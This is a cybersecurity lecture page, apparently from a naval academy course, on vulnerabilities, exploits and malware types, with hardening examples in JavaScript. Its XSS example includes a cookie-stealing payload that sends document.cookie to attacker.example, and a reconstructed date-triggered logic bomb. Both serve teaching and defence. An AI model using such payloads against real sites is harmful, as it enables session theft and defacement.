Programs – Input/Output, Conditionals, and Vulnerabilities
Learning Outcomes
After completing these activities you should be able to:
Programs - Vulnerabilities
Relate issues regarding basic programs to more complex programs and information systems
Programs - Malware
Classify various types of malware.
Describe malware as an attack vector that in most cases depends on both a vulnerability and a user action; define "zero day".
Vulnerabilities, Exploits, and Malware
Previous lectures have mentioned the concept of vulnerabilities; in our JavaScript lecture, for instance, we explored some examples where code behaved unexpectedly by not properly handling the data type (string, number, boolean) of a user's input, potentially causing a security issue. The examples below also highlight some real-world instances where software flaws impacted military systems.
USS Yorktown (1997): During testing of a Smart Ship automation system, a sailor entered 0 which was used as a divisor in a calculation, causing a divide-by-zero error. The resulting crash cascaded through the ship’s local network, disabling the Smart Ship systems and leaving the Yorktown dead in the water for nearly three hours.
MIM-104 Patriot Missile System (1991): The Patriot weapons-control software gradually lost tracking precision the longer it ran without restart; after extended operation (weeks in the field) the system’s accuracy degraded significantly. On February 25, 1991, this degradation contributed to a failure to properly track a Scud missile that struck a nearby barracks, killing 28 U.S. service members.
F-22 Raptor test flight (1992): The F-22’s fly-by-wire flight-control software encountered unexpected behavior when the pilot performed two concurrent actions (retracting landing gear while engaging afterburner). That unanticipated interaction produced a physical oscillation outside the software’s expected parameters and led to a crash of the first flying prototype.
Friendly-fire airstrike (Kandahar, 2001): During a JDAM strike, a GPS targeting device used by U.S. Special Forces lost power when its battery died; after the battery was replaced and the device rebooted, the unit’s startup sequence reset the saved target coordinates to the device’s location. The resulting error caused an airstrike that killed three U.S. Special Forces personnel.
The above case studies involved complex software comprising thousands to millions of lines of code, making it incredibly difficult to identify flaws. The code snippet below, which we also saw in the JavaScript lecture, is far shorter. It is meant to demonstrate basic ATM functionality, but it has a security flaw. Can you identify it?
Withdrawing Money from an ATM
In this example, the ATM code doesn't check for negative numbers; if an adversary entered a negative withdrawal amount, the subtraction would add to their balance instead of reducing it!
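As an added illustration (not the lecture's own ATM snippet), here is a JavaScript withdrawal routine with the flaw described above, beside a hardened version. The starting balance, the $500 per-transaction limit and the sample inputs are assumptions made for the example:

```javascript
// Added example, not the lecture's original ATM snippet: a withdrawal routine
// that trusts the amount it is given, beside a hardened version. Balances are
// whole cents to avoid floating-point drift.

// Vulnerable: nothing stops a negative amount. Subtracting -50000 cents
// *adds* $500 to the balance, which is exactly the flaw described above.
function withdrawUnchecked(balanceCents, amountCents) {
  if (amountCents > balanceCents) {
    return { ok: false, balanceCents, reason: 'insufficient funds' };
  }
  return { ok: true, balanceCents: balanceCents - amountCents };
}

// Assumed per-transaction limit ($500); a real ATM would load this from policy.
const MAX_WITHDRAWAL_CENTS = 50000;

// Hardened: reject anything that is not a positive whole number of cents
// within the limit *before* touching the balance. The order matters: type and
// sign checks come first, so NaN, strings and negatives never reach the arithmetic.
function withdrawChecked(balanceCents, amountCents) {
  if (typeof amountCents !== 'number' || !Number.isInteger(amountCents)) {
    return { ok: false, balanceCents, reason: 'amount must be a whole number of cents' };
  }
  if (amountCents <= 0) {
    return { ok: false, balanceCents, reason: 'amount must be positive' };
  }
  if (amountCents > MAX_WITHDRAWAL_CENTS) {
    return { ok: false, balanceCents, reason: 'exceeds per-transaction limit' };
  }
  if (amountCents > balanceCents) {
    return { ok: false, balanceCents, reason: 'insufficient funds' };
  }
  return { ok: true, balanceCents: balanceCents - amountCents };
}

// Keypads and web forms deliver strings. Number() is too permissive for money
// (Number('-50') is -50, Number('1e3') is 1000, Number('') is 0), so accept only
// digits with an optional two-decimal fraction and convert to cents ourselves.
function parseAmountCents(input) {
  if (typeof input !== 'string') return null;
  const s = input.trim();
  if (!/^\d+(\.\d{1,2})?$/.test(s)) return null;
  const [dollars, frac = ''] = s.split('.');
  return Number(dollars) * 100 + Number(frac.padEnd(2, '0'));
}

// Demo: the same requests against both versions.
const START_BALANCE_CENTS = 10000; // $100.00
console.log('unchecked, withdraw -500.00:', withdrawUnchecked(START_BALANCE_CENTS, -50000));
console.log('checked,   withdraw -500.00:', withdrawChecked(START_BALANCE_CENTS, -50000));
console.log('checked,   withdraw   25.00:', withdrawChecked(START_BALANCE_CENTS, parseAmountCents('25.00')));
```

Note that the hardened version validates the parsed number, not just the string: a form field that is later changed to send JSON numbers directly would still be caught by the type and sign checks.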
In our Cross-Site Scripting lab, we took this a step further. The lack of sanitization left the message board website vulnerable to injection attacks, where user input was treated as raw HTML (or JavaScript), allowing an attacker to alter website content, steal cookies, and even redirect users. This kind of weakness is a vulnerability: a flaw or weakness in a system, application, or network that can be exploited or misused to cause harm. Vulnerabilities can exist anywhere in a computer system, from the operating system and application layer down to firmware and even hardware.
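As an added example (not the lab's message-board code), here is the same mistake and its fix in JavaScript: one renderer pastes user text straight into HTML, the other escapes it first. The author name, the post, and the attacker.example host are constructed for the example:

```javascript
// Added example, not the lab's message-board code: rendering an untrusted post
// two ways. The unsafe renderer does what the vulnerable site did, treat user
// text as HTML; the safe renderer escapes it first.

// Vulnerable: the message is concatenated straight into markup, so a post
// containing tags becomes live HTML (and JavaScript) for every viewer.
function renderPostUnsafe(author, message) {
  return `<div class="post"><b>${author}</b>: ${message}</div>`;
}

// The five characters that can change the meaning of an HTML text node or a
// double-quoted attribute value.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Safe: every piece of untrusted text is escaped at the point it enters markup.
function renderPostSafe(author, message) {
  return `<div class="post"><b>${escapeHtml(author)}</b>: ${escapeHtml(message)}</div>`;
}

// Constructed attacker post (attacker.example is a reserved, non-routable name):
// an image that fails to load and, in its error handler, sends the viewer's
// cookies to the attacker, i.e. the cookie theft described above.
const ATTACK_POST =
  '<img src="x" onerror="location=\'https://attacker.example/?c=\'+document.cookie">';

// Does the rendered HTML still contain a live tag of the given name?
function containsLiveTag(html, tagName) {
  return new RegExp(`<${tagName}\\b`, 'i').test(html);
}

// In a browser, the better fix is not to build HTML strings at all: assign
// untrusted text with textContent / text nodes, which are never parsed as markup.
// (Assumes a DOM; not called in the demo below.)
function appendPostToDom(container, author, message) {
  const div = document.createElement('div');
  div.className = 'post';
  const b = document.createElement('b');
  b.textContent = author;
  div.appendChild(b);
  div.appendChild(document.createTextNode(': ' + message));
  container.appendChild(div);
  return div;
}

console.log('unsafe:', renderPostUnsafe('mallory', ATTACK_POST));
console.log('safe:  ', renderPostSafe('mallory', ATTACK_POST));
```

Escaping on output is the minimum; on a real site you would also set the session cookie as HttpOnly so that script cannot read it even if an injection slips through.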
When attackers discover such weaknesses, they often develop an exploit: a piece of code or program designed specifically to take advantage of that security flaw. Exploits are the practical tools of attack: they turn a theoretical weakness into a working method of intrusion. For example, in the context of a vulnerable database, an exploit could be specially crafted input that results in confidential database entries being leaked or database values being deleted (for more information, read up on SQL injection).
Exploits are often used by programs known as malware, short for malicious software. Malware is any program that is covertly placed on a computer or electronic device with the intent to compromise the confidentiality, integrity, or availability of data, applications, or operating systems. Malware generally does not refer to software with unintentional bugs that adversely impact the confidentiality, integrity or availability of an information system. Malware usually represents a different approach to attacking a system than the network attacks we've discussed, because the victim generally installs the malware or takes some action that results in the malware being installed, not realizing what they're doing, of course. In other words, instead of breaking into a system, we trick users into inviting us in.
There are many different types of malware — viruses, worms, trojans, ransomware, and spyware, among others — but they all share the same core goal: to damage, steal, or control digital assets without authorization. In our XSS example, the injected script that steals cookies or redirects users is effectively acting as a small piece of malware running within the browser.
A particularly dangerous scenario arises when attackers exploit a vulnerability that no one else knows about, not even the developers who created the system. This kind of weakness is called a zero day, referring to the fact that defenders have had zero days to detect or patch it. Zero-day vulnerabilities are especially valuable in the cybersecurity world because they can be used to silently compromise systems before any updates or mitigations exist. Governments, intelligence agencies, and cybercriminal organizations have been known to pay large sums for zero-day exploits, given their potential impact.
Cataloging Vulnerabilities, Exploits, and Malware
Vulnerabilities, exploits, and malware are obviously concerning. Before we even begin discussing how to defend against them, one of the first steps in cybersecurity is to identify and catalog them. Just as scientists classify viruses and engineers track software bugs, cybersecurity professionals maintain public records of known vulnerabilities and malicious software.
For vulnerabilities, this process is standardized through the Common Vulnerabilities and Exposures (CVE) system. A CVE is a unique identifier assigned to a specific, publicly known security flaw, akin to a serial number for vulnerabilities. Each CVE entry provides a short description of the issue, along with references to more detailed information or patches. For example, the "EternalBlue" exploit that targeted older versions of Windows leveraged a vulnerability identified as CVE-2017-0144. (CVEs, or more formally CVE Records, are formatted as "CVE-{year the ID was assigned}-{sequence number of four or more digits}".)
While a CVE tells us what the vulnerability is, it doesn’t tell us how bad it is. That’s where the Common Vulnerability Scoring System (CVSS) comes in. CVSS assigns a numerical score (from 0.0 to 10.0) that reflects the severity of a vulnerability, based on factors like how easily it can be exploited, whether it requires user interaction, and the potential impact on system confidentiality, integrity, and availability. For instance, a local vulnerability requiring physical access might score around 4.0 (medium), while a remotely exploitable flaw allowing full system takeover could rate as 9.8 or even 10.0 (critical).
We will cover both CVE and CVSS in greater detail later in the Vulnerability Management and Incident Response lecture, but for now it's important to recognize that these systems give us a common language for discussing and prioritizing vulnerabilities across the cybersecurity community.
Similarly, malware is also catalogued and tracked, though it's a bit less formalized. Malware can be identified by names (like WannaCry or ILOVEYOU), families (groups of related variants that share code or behavior), or file hashes. Security researchers and antivirus vendors maintain massive databases of malware samples, allowing analysts to compare newly discovered threats to known ones, detect variants, and study their evolution over time. We will dive a bit deeper into the characterization of threat actors and their tools, including malware families, in the upcoming Cyber Threat Intelligence lecture.
For now, let’s shift our focus to the types of malware—the different forms these malicious programs can take and how they achieve their goals.
Bugs in the JavaScript Interpreter and the 2008 PWN2OWN Contest
The bugs that we've looked at so far (possibility of infinite loops, bad input crashing programs, and unexpected input allowing us to cheat at games) are all problems with JavaScript programs. Only the writers and users of these programs need to worry about them. A much deeper and more worrisome problem arises when there is a bug in the JavaScript interpreter. When that happens, a malicious JavaScript program can take advantage of the bug in the interpreter to make the user's browser, or even the user's PC, do bad things.
Every year the security conference CanSecWest holds the PWN2OWN contest, where participants try to exploit (take advantage of) bugs in browsers in order to "PWN" a computer whose browser visited their web page. Essentially, you've pwned a computer if you can get it to execute shell commands of your choosing, preferably in an administrator/root shell. In 2008, one group took advantage of a bug in Apple's Safari browser's JavaScript interpreter to pwn a MacBook Air. In other words, the MacBook Air's browser followed a link to this group's evil web page, and two minutes later they were able to send shell commands to the MacBook Air and have it execute them.
Check out this 2008 news article or, if you really want to know, you can look at this whitepaper by the team that created the hack.
Verizon Data Breach Investigations Report
Each year organizations track the type and quantity of known data breaches in order to recognize trends and allocate resources to defend against the most likely and/or most damaging types of attacks. We'll learn more about the way in which these decisions are made, a process called Risk Analysis/Risk Management, in the next lesson. The most widely recognized data breach report in the corporate sector is the Verizon Data Breach Investigations Report, published by Verizon, the same internet service provider and telephone company that the academy uses. The report is publicly available via their website. Below is a chart showing the types of successful data breaches in 2017, incidents in which someone not only attempted but succeeded in accessing a system they were not authorized to access.
Verizon Data Breach Investigations Report by Verizon Communications Inc., 2017.
Computer Virus Grounds Drone Fleet
Viruses and malware are problems out in the fleet, not only on people's everyday work computers, but also in the computers used to control platforms such as UAVs. Read about how a persistent virus on computers used to control drones disrupted operations in the fall of 2011.
Types of Malware
Virus
This is the most broadly used term for unwanted programs on our computers. A computer virus is a program that, with the help of some user action, replicates itself and "infects" a computer, typically without the knowledge of the user. A virus might corrupt or delete data on a computer, or even the whole hard drive.
A virus will attach itself to another program or file on your computer. Most often they will attach to executables, and cannot run unless the executable file is executed. A virus cannot spread past your computer without some human action assisting. There are many different kinds of viruses including:
Macro: A virus written in a macro language for a separate application, such as a word processor. Some programs (Microsoft Office products, for example) allow macro programs to be embedded in documents, which provides a unique vector for viruses. A famous example is the Melissa virus. The virus was a macro inside a Microsoft Word document named List.DOC. A macro embedded in a Word document is exactly analogous to a script embedded in a web page: when the Word document is opened, the macro is executed. In the case of the Melissa virus, the macro/script did some bad things, including sending e-mails with List.DOC attached to the first 50 addresses in your address book, thereby propagating itself.
Program virus: This is the most traditional virus: executable code that attaches itself to some other file (which usually looks benign) and runs when that file is executed.
Boot sector: A virus that starts every time a computer boots. This can be mitigated by setting this area on the disk to read-only, so that only the Administrator can override.
Worms
A computer worm is a self-replicating, self-propagating program that uses networking mechanisms to spread itself. This is a virus with the added functionality of spreading across a network without any help from a user. This is in contrast with most viruses and Trojans, which rely on the unwitting help of users. A worm typically scans the surrounding network and then exploits specific vulnerabilities in the host operating systems or services via an open port and then transfers itself to the new host. There are also other methods of propagation.
Some famous examples:
The Stuxnet worm targeted Siemens Supervisory Control and Data Acquisition (SCADA) systems.
Trojan Horse
A trojan horse is named for the famous Greek story of ancient times. In the computer world, a trojan horse is a program that appears to have a useful function, but also has a hidden and potentially malicious function that evades security mechanisms, sometimes exploiting legitimate authorizations of a system entity that invoked the program. In contrast to viruses, Trojans don't try to propagate — they don't try to replicate themselves or send themselves to other machines. In fact, "trojan" refers to the mechanism by which the malware is delivered, not really to the malware itself. Once malware is delivered via a trojan, it might be used to gain access to other hosts, but not usually via the same trojan mechanism.
Back Orifice is an example of a trojan program. It provided legitimate functionality as a remote administration tool, but other functionality made it less suited for this legitimate role. The Back Orifice server program can hide itself from cursory inspections of the system and can even be installed without the user's permission.
Another vector prevalent today is fake anti-virus programs on the web. A person visits a web site, and a pop-up window indicates they have 17 different types of spyware/viruses on their computer. If the user then downloads the program to eliminate the malware, he or she has now installed a different malware program! The initial window that the user sees is in all likelihood just making up results to get the user to download the program.
To see a concrete example of a Trojan Horse, go check out your personal SY110 web page (recall: http://midn.cyber.usna.edu/~m9999/index.html).
Oh no, it looks like your website has been compromised! What happened? It turns out that in the sy110animation.js file you were told to embed, there was a hidden logic bomb: a piece of code that is not activated until some condition is triggered. In this case, that portion of the code executed only when the date and time fell between 0700 and 1600 on the day of this lecture (the JavaScript Date constructor takes year, month, day, hour, minute, second, with months counted from 0, so January is month 0). Once that date and time condition was met, the code replaced the inner HTML of one of the page's elements with the specified image, effectively defacing the website.
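The sy110animation.js file itself is not reproduced here. As an added example (not that file), here is a JavaScript reconstruction of the kind of time-gated condition it used, with a stand-in lecture date of 17 October 2023, a harmless callback in place of the page rewrite, and a sweep helper that shows how to expose such a condition when reviewing a third-party script:

```javascript
// Added example, not the actual sy110animation.js: a reconstruction of the kind
// of time-triggered condition described above, written so the trigger can be
// tested against an injected clock. The lecture date (2023-10-17) is a stand-in
// and the payload is a callback rather than a page rewrite.

// JavaScript's Date constructor counts months from 0, so October is 9. Writing
// 10 here would silently move the trigger to November, a common slip in this
// kind of code and a useful thing to know when reading it.
const TRIGGER_START = new Date(2023, 9, 17, 7, 0, 0);   // 0700 on the lecture day
const TRIGGER_END   = new Date(2023, 9, 17, 16, 0, 0);  // 1600 on the lecture day

function inTriggerWindow(now) {
  return now >= TRIGGER_START && now < TRIGGER_END;
}

// The script's entry point. `now` and `deface` are injected so the behaviour
// can be exercised without waiting for the real date or having a DOM.
function runAnimation(now, deface) {
  if (inTriggerWindow(now)) {
    deface();            // the original replaced page markup with an image here
    return 'defaced';
  }
  return 'benign';       // what a reviewer who runs it on any other day sees
}

// Audit helper: run a suspect function against many clock values and collect
// the ones on which it misbehaves. A single run tells you almost nothing about
// a date-gated payload; a sweep across the calendar does.
function sweepClock(start, end, stepMinutes, misbehaves) {
  const hits = [];
  for (let t = start.getTime(); t <= end.getTime(); t += stepMinutes * 60 * 1000) {
    const when = new Date(t);
    if (misbehaves(when)) hits.push(when);
  }
  return hits;
}

// Hourly sweep over the two days around the stand-in lecture date.
const hits = sweepClock(new Date(2023, 9, 16), new Date(2023, 9, 18), 60,
  (when) => runAnimation(when, () => {}) === 'defaced');
console.log(`${hits.length} hourly checks fired:`, hits.map((d) => d.toString()));
```

The practical lesson for reviewing someone else's script is to grep for Date, getHours, getMonth and similar calls, and to exercise anything gated on them with a controlled clock rather than trusting a single run.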
Ransomware
Now that we have categorized some malware by delivery method, let us look at a type of malware categorized by what it does once it is delivered: ransomware.
Just as in a conventional ransom, where a criminal demands money in exchange for a hostage, a cyber criminal can use ransomware to demand money in exchange for restoring access to the victim's data.
CISA defines ransomware as an ever-evolving form of malware designed to encrypt files on a device, rendering any files and the systems that rely on them unusable.
We will cover encryption later in the course, but for now think of encryption as scrambling your data with a "secret" key that only the attacker knows. When the authorized user tries to access her files, she is unable to, because she does not have the key to unscramble the data. This type of malware can be particularly insidious because, just as in a hostage situation, the clock is ticking for the victim to pay the ransom... or else.
Colonial Pipeline and Darkside
You may have heard about the Colonial Pipeline hack in 2021. This significant attack is an example of ransomware: Colonial Pipeline, a U.S. energy company, was attacked and could not access its own systems. This inability to access its systems forced Colonial Pipeline to shut down many of its pipelines, which supply significant amounts of fuel to the U.S. East Coast from Texas to New Jersey. Gas shortages and price increases were feared, but the disruption was limited to a few days after the company paid the ransom to the suspected attackers, a group named DarkSide.
There were some silver linings to this story aside from the increased national awareness of ransomware attacks. The FBI was soon able to recover more than half of the ransom that Colonial Pipeline paid to the attackers. Like most ransomware operators, DarkSide demanded the ransom in Bitcoin; the FBI was able to trace the payment to a specific wallet and obtain the private key for that wallet, allowing it to seize the funds. You can read more of the details of this ransomware attack in this news article.
Colonial Pipeline Getty Images
An attacker can do a few things with the data if the ransom is not paid. The attacker can simply never reveal the key to unscramble the data, effectively "deleting" the data forever. So, in the never-ending cat and mouse game of cybersecurity, many organizations have started backing up data on other devices so that if they fall victim to a ransomware attack, they will not have to pay the ransom and can restore from the backup copy. (The backup only helps if the malware cannot reach it: a backup drive or share that stays connected to the infected network is routinely encrypted along with everything else, so backups need to be kept offline or otherwise out of the attacker's reach.) This method is still costly, as any interruption in the use of data (think about the pillars here!) takes time and resources from an organization. Attackers have not let backups stop ransomware attacks. Many attackers now don't just threaten to destroy the key and "delete" the data; they also threaten to release the data publicly. You may wonder whether that is acceptable, since the organization gets its data back either way. Not exactly: think of a hospital with thousands of patients' medical histories being released, or a company with proprietary information. Attackers releasing stolen data publicly can and does have serious privacy implications.
Some companies and organizations even have specific ransomware insurance! The best way to deal with ransomware is to not get it. Easier said than done, but like most cybersecurity risks, vigilance, training, and good cyber hygiene are effective mitigations.
Other Malware Types
There are additional malware types, such as adware (downloads or displays unwanted ads when a user is online or redirects search requests to certain advertising websites) and spyware (gathers a user's sensitive information and reports it to unauthorized third parties). For some additional information, take a look at this Malware Tip Card, courtesy of the Cybersecurity and Infrastructure Security Agency (CISA).
Malware: What can it do?
Once on your system, malware could be doing a host of bad things beyond just ransomware.
Files could be deleted or sent back to the attacker. This is not very imaginative, of course, but still bad for you.
Your machine could become a zombie, i.e. a host that's owned (in the sense that a bad guy can give it commands as administrator) and, at his bidding, might be used to do bad things like send spam or participate in a DDoS attack. Collections of zombies with a single master are often called botnets. There are large botnets out there of hundreds of thousands of hosts, whose services are for sale. Malware often uses the Internet to communicate with a command and control host from which it receives instructions on what to do next. Zombie hosts may simply be waiting for a signal from the command and control host.
Check out Attack of the Bots , Wired Magazine, 2006 . It's a bit old (2006) but is, in typical Wired fashion, a very nicely written, engaging account of a botnet attack. Botnets are a serious problem, posing a threat not only to businesses, but even to governments.
Your machine may become a springboard for a larger attack against the system you are a part of. Once again, there may be a command and control host sending instructions as to what to do next.
Programs that violate confidentiality might be installed, like keyloggers, which capture what you type (or more generally what you click on or see on the screen). The malware could even turn on your computer's webcam unbeknownst to you and get a video feed! [Computer Technician Trevor Harwell Installed Peeping Software On Women's Computers, Sophos press release on webcam spying]
Revisiting the DoD ban on USB sticks
You now know enough to understand the malware threat that led to the DoD banning the use of USB sticks. It was named "Agent.btz" and is a variant of "SillyFDC" with the following capabilities:
it begins executing when the Windows Desktop appears
it injects code into explorer.exe (i.e., the Windows Desktop program itself)
copies itself to attached removable drives (e.g., a USB stick)
executes automatically when an infected removable drive is attached
can download and install files from particular URLs
modifies security settings and Safe Mode settings
bypasses Windows firewall and disables Task Manager
Imagine that malware on the NIPRnet!
Duqu: a mini case study
One instance of malware that came to light in 2011 is known as Duqu. Taking a closer look at it is worthwhile because it illustrates a few points from this lesson along with connections to prior lessons. First off, there have been several Duqu attacks. We're talking about one of them. An interesting feature is that they each appear to have been somewhat customized to their target.
Getting a foot in the door
Duqu was initiated with a spearphishing attack: an e-mail to a company employee requesting more information with, in particular, the line "In the attached file, please see a list of requests." The "attached file" was an innocuous-looking Microsoft Word document. Opening up that Word document is what started all the trouble. In this we see why malware offers a different approach to attacking: the user actually opened the door and let the attacker in by opening that attachment.
The exploit: executing shell-code with administrator privileges
So how could simply viewing a Word document cause problems? The Word document sent in this attack contained an "embedded font", meaning that the file carried within it a block of bytes defining what the characters used in the document should look like when displayed. The bytes that comprise the font definition are read in and processed by operating-system code that runs in kernel mode, with higher privileges than any user account, administrator included. The font definition was deliberately malformed in such a way as to trick this OS code into executing shell code (which was also part of the malformed font definition); because the shell code was executed by the OS code, it ran with the highest possible privileges. This shell code installed the Duqu malware, which then was up and running long-term on the host, regardless of whether the Word document or Word itself remained open.
Once established, what did it do?
The motives of the attackers using Duqu have not been publicly reported. But some of the malware's activities, if not the reasons for them, have been disclosed. Duqu contacted a command-and-control (C&C) server to receive instructions; the communication between the C&C server and the infected machine was done over HTTP and HTTPS. At least one Duqu C&C server, though not the one in the attack we're describing, was traced to a machine in Belgium at IP address 77.241.93.160. The C&C server loaded an extra module (piece of code) onto the infected host that allowed it to attack another machine on the same network, making use of that local network access. Yet another module loaded onto the infected host by the C&C server was a key logger, which logged keystrokes and grabbed screen captures.
Further Reading
symantec.com
Information on the scope of Duqu infections.
securelist.com
A detailed description of one particular infection. Lots of nice screenshots!
nist.gov
NIST National Vulnerability Database entry for the Windows
font processing vulnerability exploited by Duqu.
informationweek.com
7 Facts On Duqu Malware Attacks
Malware as a Weapon
Malware has actually been used as an alternative to physical ("kinetic") attacks. In particular, as related in a June 1, 2012 New York Times article, the U.S. and Israel cooperated to produce malware dubbed "Stuxnet", which was designed to cripple the Iranian nuclear program. The article claims that one of the motivations for the U.S. in creating Stuxnet was to dissuade Israel from carrying out a physical attack. Was the U.S. also responsible for the Flame malware? Duqu?
There are serious ethical, legal, and policy questions surrounding the use of offensive "cyber weapons". With the revelation that the U.S. has created and used such a weapon, the debate around these questions has become more urgent. You are taking or will take courses here at USNA about ethics, policy and even law. Keep these questions about the use of cyber weapons in mind as you take these other courses.
Prevention/Detection/Recovery
Malware Prevention
Email:
Leverage digital signatures.
Encrypt messages.
Verify the source of the originating message by contacting senders using official means.
- Don't use contact details or links provided in an email message. Instead, visit the official website or track down contact phone numbers through other appropriate resources
- Social engineering techniques will create urgent, time-sensitive requirements. Take a moment to think of fraudulent schemes and clear your mind before providing information or immediately responding
Personal email protections through aliases and masked emails, where appropriate.
- Yahoo, DuckDuckGo, Apple, Firefox, Proton Mail and many other providers offer the ability to increase privacy through email alias and masking services
Endpoint Security:
Leverage the full security protection suite, to include web and online threat prevention, anti-virus, firewalls, vulnerability scanning, spam filtering, and ransomware remediation.
Maintain up-to-date software and definitions, to include system updates and 3rd party software.
Don't connect unknown devices or media to the system.
Software:
Only install approved software provided by the organization.
Verify and scan downloaded files.
Remove unused and unnecessary applications from a system.
Mobile Devices:
Employ the use of Endpoint Security.
Use trusted VPN services to secure and encrypt wireless communications.
Only connect to known WiFi networks. Use a passthrough firewall (i.e. portable wireless router) when connecting to unknown or open WiFi networks.
Disable all wireless transmissions when not in use (e.g. Bluetooth, NFC, WiFi, etc...).
Leverage encryption services for app messaging, email, and passwords.
Limit permissions for apps, remove unused apps, and update required apps to the latest versions.
Use data-at-rest encryption for all mobile devices.
Be aware of your surroundings and keep mobile devices physically secured.
- Do not leave phones on tables while dining
- Do not leave laptops in vehicles
- Use cable locks where possible
Online:
Websites and browsers should require the use of TLS 1.2 or 1.3 in addition to HTTP Strict Transport Security (HSTS)
Remove revoked, expired, and untrusted root certificates
Utilize only trusted DNS services.
- Enterprise networks should implement Domain Name System Security Extensions (DNSSEC)
- Personal and home networks should leverage automated DNS protection services, such as OpenDNS
Best Practices:
Understand and comply with system usage policies
Enable auditing and monitor audits.
Correct any unsafe habits/policy violations.
Keep systems physically secure.
Report any abnormal response/uninitiated behavior to your system administrator immediately.
Malware Detection
Users are often the first to observe an alert or anomalous behavior on a system or network. This includes any message prompted by endpoint detection software or by the malware itself, as is the case for ransomware.
System logs will often show network administrators the connections, failures, and unexpected errors caused by malware.
Network security devices, such as firewalls, IDS, IPS, and ACLs, will also generate logs when they drop or reject traffic, match rules, or suffer significant performance degradation because of malware.
Heuristic, behavioral, or hybrid detection methods are employed across the suite of security tools to maximize the likelihood of successful identification while reducing false-positive (type I) and false-negative (type II) errors.
Recovery
Recovery is used to return the system or network to the nominal state it was in prior to impact. Keep the following in mind as a user:
Contact the IT Department or network security administrator.
Do not take actions on your own as it may create additional problems or impede a proper and complete investigation.
- The latest enterprise endpoint security tools have the ability to isolate systems from the network without physically disconnecting or powering it off. This enables security tools and incident response teams to access and evaluate issues while preventing malware from spreading or impacting the network.
Be honest! If system usage policies were violated, it will become known anyway, and not identifying the real cause will hinder the investigation and further delay a proper response from the incident response team, thereby exacerbating the problem. If you are honest up front, the team can fix the issue and deal with the policy violations later.
Backup your important files or ensure it's saved to the cloud. You should do this at periodic intervals. This is like car insurance. You want it there if you ever need it, but you hope you never need it.
A compromised system will likely be replaced with another one. If a serious investigation is required, the hard drive will be pulled from the system so that forensics can be conducted. In most cases, the system will be rebuilt with the latest image and all information on the drive will be wiped.
Thinking Critically: Not Everything Is a Cyber Attack
Information systems can fail for many reasons, not just because they have been attacked in cyberspace. They failed before there were hackers, and in a utopia where hackers do not exist, they would still fail from time to time. Sources of failure can be internal: faulty administration, feckless users, poorly-written software, or low-quality hardware. Systems and the machines they control can also fail from external factors such as natural events (weather, earthquakes, animals, ...), human-caused accidents, or operator error. To quote Chris Inglis, former Deputy Director of NSA and a member of our cyber faculty, "I don't think paralysis [of the electrical grid] is more likely by cyber-attack than by natural disaster. And frankly the number-one threat experienced to date by the US electrical grid is squirrels." Check out Inside Energy's "Data: Explore 15 Years of Power Outages" report for an in-depth look at what causes power outages... or, for some fun, check out the Cyber Squirrel website to see all their ongoing operations against wires worldwide.
There are two lessons here. First, just because your system failed does not mean that hackers were at fault. Although we should always be alert to the possibility that failure was induced, we should also be receptive to the possibility that failure stemmed from other causes. Second, just because you've protected your system against hackers does not mean that your systems will not fail. There must always be contingency plans to carry out the mission in the event of failure.
Supplemental Media:
This is what happens when you reply to spam email
Review Questions:
What are some examples of vulnerabilities in DoD systems that were introduced by user input errors?
How do we classify malware?
What is the difference between a Virus and a Worm?
What is it about Trojans that entices users to install them?
What is the difference between Adware and Spyware?
Can you explain how Ransomware works?
Can you name a few recent worms?
What are the different types of a virus?
Why are rootkits hard to remove?
What can you do to prevent getting malware when browsing the web? Using email? Using removable media?
How do we detect malware (name a few different ways)?
References
CISA, 2021. "Stop Ransomware" CISA https://www.cisa.gov/stopransomware
Goodin, Dan. 2008. "Mac Is the First to Fall in Pwn2Own Hack Contest." The Register, March 28, 2008. https://www.theregister.co.uk/2008/03/28/mac_hack/
Paramadilok, John. 2020. "Teleworking & Ensuring Cybersecurity at Home." CHIPS, April-June 2020. https://www.doncio.navy.mil/chips/ArticleDetails.aspx?ID=13542
Poulsen, Kevin. 2014. "Two Dudes Prove How Easy It Is to Hack ATMs for Free Cash." Wired, November 2014. https://www.wired.com/2014/11/nashville/
Schmitt, Eric. 1992. "Computer Flaw Suspected in Test-Plane Crash." New York Times, April 30, 1992. https://www.nytimes.com/1992/04/30/us/computer-flaw-suspected-in-test-plane-crash.html?mtrref=undefined&gwh=D78E1C65FA340D601C56B58C59C8A3D5&gwt=pay
Thompson, Mark. 2014. "U.S. Military: The Curse of 'Friendly Fire'." Time, June 11, 2014. http://time.com/2854306/the-curse-of-friendly-fire/
U.S. General Accounting Office. 1992. PATRIOT MISSILE DEFENSE: Software Problem Led to System Failure at Dhahran, Saudi Arabia. Washington: February 4, 1992. https://www.gao.gov/assets/220/215614.pdf
Wired Staff. 1998. "Sunk By Windows NT." Wired, July 24, 1998. https://www.wired.com/1998/07/sunk-by-windows-nt/